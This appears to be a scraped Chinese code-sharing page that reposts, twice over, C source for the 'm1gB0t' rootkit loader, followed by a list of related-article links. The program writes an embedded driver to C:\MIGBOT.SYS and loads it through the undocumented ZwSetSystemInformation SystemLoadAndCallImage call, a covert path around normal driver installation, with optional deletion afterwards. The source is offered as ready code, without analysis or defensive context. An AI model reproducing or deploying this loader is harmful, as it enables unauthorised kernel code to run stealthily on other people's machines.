释放-加载-删除驱动的代码
来源:互联网 发布:java string 中文乱码 编辑:程序博客网 时间:2024/05/20 13:06
#pragma comment(linker,"/ENTRY:main")
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
//#pragma comment(lib,"msvcrt.lib")
#if (_MSC_VER < 1300)
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/OPT:NOWIN98")
#endif
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS
[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;
typedef long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef
NTSTATUS
(__stdcall *ZWSETSYSTEMINFORMATION)(
DWORD SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength
);
typedef
VOID
(__stdcall *RTLINITUNICODESTRING)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38
bool decompress_sysfile();
bool load_sysfile();
bool cleanup();
void main()
{
if(!decompress_sysfile())
{
printf("Failed to decompress m1gB0t\r\n");
}
else if(!load_sysfile())
{
printf("Failed to load m1gB0t\r\n");
}
if(!cleanup())
{
printf("Cleanup failed\r\n");
}
}
//----------------------------------------------------------------
//在磁盘上生成驱动文件
//----------------------------------------------------------------
bool decompress_sysfile()
{
HRSRC aResourceH;
HGLOBAL aResourceHGlobal;
unsigned char * aFilePtr;
unsigned long aFileSize;
HANDLE file_handle;
//////////////////////////////////////////////////////////
// 在当前的二进制文件的EXE中找到一个命名的资源
//////////////////////////////////////////////////////////
aResourceH = FindResource(NULL, "MIGBOT", "BINARY");
if(!aResourceH)
{
return false;
}
aResourceHGlobal = LoadResource(NULL, aResourceH);
if(!aResourceHGlobal)
{
return false;
}
aFileSize = SizeofResource(NULL, aResourceH);
aFilePtr = (unsigned char *)LockResource(aResourceHGlobal);
if(!aFilePtr)
{
return false;
}
file_handle =
CreateFile(
"C:\\MIGBOT.SYS",
FILE_ALL_ACCESS,
0,
NULL,
CREATE_ALWAYS,
0,
NULL);
if(INVALID_HANDLE_VALUE == file_handle)
{
return false;
}
while(aFileSize--)
{
unsigned long numWritten;
WriteFile(file_handle, aFilePtr, 1, &numWritten, NULL);
aFilePtr++;
}
CloseHandle(file_handle);
return true;
}
//----------------------------------------------------------------
// 用非正规方法加载驱动
//----------------------------------------------------------------
bool load_sysfile()
{
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"\\??\\C:\\MIGBOT.SYS";
//////////////////////////////////////////////////////////////
// get DLL entry points
//////////////////////////////////////////////////////////////
if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING)
GetProcAddress( GetModuleHandle("ntdll.dll")
,"RtlInitUnicodeString"
)))
{
return false;
}
if(!(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION)
GetProcAddress(
GetModuleHandle("ntdll.dll")
,"ZwSetSystemInformation" )))
{
return false;
}
RtlInitUnicodeString(
&(GregsImage.ModuleName)
,daPath
);
if(
!NT_SUCCESS(
ZwSetSystemInformation(
SystemLoadAndCallImage
,&GregsImage
,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
{
return false;
}
return true;
}
//----------------------------------------------------------------
// 删除驱动
//----------------------------------------------------------------
bool cleanup()
{
#ifdef _delete_sysfile
if(S_OK != DeleteFile("C:\\MIGBOT.SYS"))
{
return false;
}
#endif
return true;
}
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
//#pragma comment(lib,"msvcrt.lib")
#if (_MSC_VER < 1300)
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/OPT:NOWIN98")
#endif
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS
[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;
typedef long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
typedef
NTSTATUS
(__stdcall *ZWSETSYSTEMINFORMATION)(
DWORD SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength
);
typedef
VOID
(__stdcall *RTLINITUNICODESTRING)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38
bool decompress_sysfile();
bool load_sysfile();
bool cleanup();
void main()
{
if(!decompress_sysfile())
{
printf("Failed to decompress m1gB0t\r\n");
}
else if(!load_sysfile())
{
printf("Failed to load m1gB0t\r\n");
}
if(!cleanup())
{
printf("Cleanup failed\r\n");
}
}
//----------------------------------------------------------------
//在磁盘上生成驱动文件
//----------------------------------------------------------------
bool decompress_sysfile()
{
HRSRC aResourceH;
HGLOBAL aResourceHGlobal;
unsigned char * aFilePtr;
unsigned long aFileSize;
HANDLE file_handle;
//////////////////////////////////////////////////////////
// 在当前的二进制文件的EXE中找到一个命名的资源
//////////////////////////////////////////////////////////
aResourceH = FindResource(NULL, "MIGBOT", "BINARY");
if(!aResourceH)
{
return false;
}
aResourceHGlobal = LoadResource(NULL, aResourceH);
if(!aResourceHGlobal)
{
return false;
}
aFileSize = SizeofResource(NULL, aResourceH);
aFilePtr = (unsigned char *)LockResource(aResourceHGlobal);
if(!aFilePtr)
{
return false;
}
file_handle =
CreateFile(
"C:\\MIGBOT.SYS",
FILE_ALL_ACCESS,
0,
NULL,
CREATE_ALWAYS,
0,
NULL);
if(INVALID_HANDLE_VALUE == file_handle)
{
return false;
}
while(aFileSize--)
{
unsigned long numWritten;
WriteFile(file_handle, aFilePtr, 1, &numWritten, NULL);
aFilePtr++;
}
CloseHandle(file_handle);
return true;
}
//----------------------------------------------------------------
// 用非正规方法加载驱动
//----------------------------------------------------------------
bool load_sysfile()
{
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"\\??\\C:\\MIGBOT.SYS";
//////////////////////////////////////////////////////////////
// get DLL entry points
//////////////////////////////////////////////////////////////
if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING)
GetProcAddress( GetModuleHandle("ntdll.dll")
,"RtlInitUnicodeString"
)))
{
return false;
}
if(!(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION)
GetProcAddress(
GetModuleHandle("ntdll.dll")
,"ZwSetSystemInformation" )))
{
return false;
}
RtlInitUnicodeString(
&(GregsImage.ModuleName)
,daPath
);
if(
!NT_SUCCESS(
ZwSetSystemInformation(
SystemLoadAndCallImage
,&GregsImage
,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
{
return false;
}
return true;
}
//----------------------------------------------------------------
// 删除驱动
//----------------------------------------------------------------
bool cleanup()
{
#ifdef _delete_sysfile
if(S_OK != DeleteFile("C:\\MIGBOT.SYS"))
{
return false;
}
#endif
return true;
}
- 释放-加载-删除驱动的代码
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- linux驱动的入口函数module_init的加载和释放
- A8开发删除不了加载的 驱动
- 一段文件删除代码(动态加载驱动)
- delphi加载驱动的代码演示
- c# 操作 sqlite
- 表单提交
- HW:分享8年开发经验,浅谈个人发展经历,明确自己发展方向
- ZwLoadDriver加载驱动
- 把文件存放在SDCard
- 释放-加载-删除驱动的代码
- Greg Hoglund大牛的ZwSetSystemInformation()加载驱动
- 对付vc6.0 编译或链接时卡死方法
- Linux与其他类Unix内核的比较
- 在gdb中打印QString
- linux命令行程序脱离命令行后台运行
- object-c 类别
- C# VS2010 制作软件安装包
- windows phone7开发环境搭建
